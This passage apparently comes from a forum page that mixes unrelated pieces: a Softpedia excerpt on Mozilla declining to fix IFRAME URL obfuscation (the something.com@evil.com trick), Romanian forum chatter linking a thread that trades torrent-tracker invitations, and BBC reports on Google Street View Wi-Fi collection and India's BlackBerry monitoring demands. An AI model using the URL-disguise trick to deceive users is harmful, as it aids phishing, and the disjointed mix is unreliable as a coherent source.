load the obfuscated something.com@evil.com instead of loading evil.com directly. "Aditya's complaint in the aforementioned bug is very simple, and boils down to the observation that Firefox employs this warning only for the top-level document - but does not apply this logic to subresources such as IFRAMEs. If you think about it for five seconds or so, it's painfully evident why: there is simply no need to do so. "The URLs of these subresources are never displayed in the address bar, and therefore, there is no opportunity to confuse the user in any way. There is no reasonable attack scenario where this would matter," writes Michal Zalewski, a security engineer at Google, who takes issue with several media sites that reported this as a bug in Firefox. Mozilla Will Not Fix IFrame URL Obfuscation Pseudo-Bug - - Softpedia

De ce ti-o dat warn? Fiindca aceste conversatii (injuraturi) le puteti tine frumos pe messenger sau prin pm. Este vorba de etica. Si pe mine ma enerveaza krisler cu intrebarile lui, dar asta nu inseamna ca incep sa fac scandal.

Facuse neme topic special pt asta http://rstcenter.com/forum/24670-invitatii-filelist-invitatie-demonoid-invitatie-lasttorrents-invitatii-trackere.rst

Are ata legata de urechea stanga pentru prima tigara.

Spain has become the latest country to launch an investigation into the collection of sensitive wi-fi data by Google. Google has admitted that its Street View cars had "accidentally" collected data from unsecured wi-fi networks in more than 30 countries. A Google representative has now been summoned to appear before a judge in Madrid on 4 October. It is in response to a complaint by a privacy watchdog called Apedanica. The Google representative has been summoned to explain what data was collected, how it was obtained and the number of people affected. "We are working with the authorities in Spain to answer any questions they have," said a spokesperson for Google. "Our ultimate objective is to delete the data consistent with our legal obligations and in consultation with the appropriate authorities." Investigations are ongoing in France, Germany and Australia. In the US, Google faces a class action lawsuit over the data harvesting, as well as a large scale investigation backed by 38 states. In the UK, the Information Commissioner (ICO) recently cleared the company after it found that it had not collected "significant" personal details. However, the firm is still under investigation by the Metropolitan police. All of the probes were prompted by Google's admission that its Street View cars "accidentally" collected data from unsecured wi-fi networks over a period of four years. The error has been blamed on a chunk of unsanctioned rogue code used in the cars. It came to light following a request by data protection authorities in Hamburg, Germany, for more information about the operation of the service.

India has sent formal notices to the country's mobile operators telling them they must have equipment to monitor Blackberry services by 31 August. The move will increase pressure on Blackberry maker Research in Motion (RIM) to allow Indian security agencies access to encrypted messages. Tata Teleservices told BBC News that the letter said it must "ensure that Legal Intervention (LI) capability is put in place" by the end of the month. RIM said it grants "lawful" access. A spokesperson for Tata Teleservices said: "As a Tata Group company, we have always abided by the law of the land and will do so here too". Other operators have confirmed that they received a similar request. 'Terrorism threat' The government has said it will shut down Blackberry services if the firm does not meet its demands to give access to its encrypted messenger and e-mail services by 31 August. In statement released on 12 August, the government said that other Blackberry services, including voice and SMS traffic, were already "available to law enforcement agencies". India, along with many other countries, believes the device and the Blackberry infrastructure are a threat to national security. Blackberry handsets automatically scramble messages and send them to servers in Canada and other countries. Authorities have said they want access to these messages and the keys to decrypt them to counter terrorism and criminal activity. The row in India is the latest in a long-running dispute between RIM and international governments. The United Arab Emirates was the first country to propose a block on the devices, followed by a raft of others including Lebanon, Algeria, Saudi Arabia and Kuwait. A ban that was supposed to come into force on 6 August in Saudi Arabia has been postponed whilst the government holds talks with RIM. 'Co-operative' company The company is also reportedly in talks with the Indian government. However, government officials contacted by BBC News declined to confirm reports that RIM would grant limited access to BlackBerry instant messages by 1 September. It also declined to confirm that it had promised talks on monitoring its more secure corporate e-mail services. RIM said it stood by a statement issued last week that said it "cannot disclose confidential regulatory discussions that take place with any government". "RIM assures its customers that it genuinely tries to be as co-operative as possible with governments in the spirit of supporting legal and national security requirements, while also preserving the lawful needs of citizens and corporations," the statement read. BBC News - India sets Blackberry monitoring deadline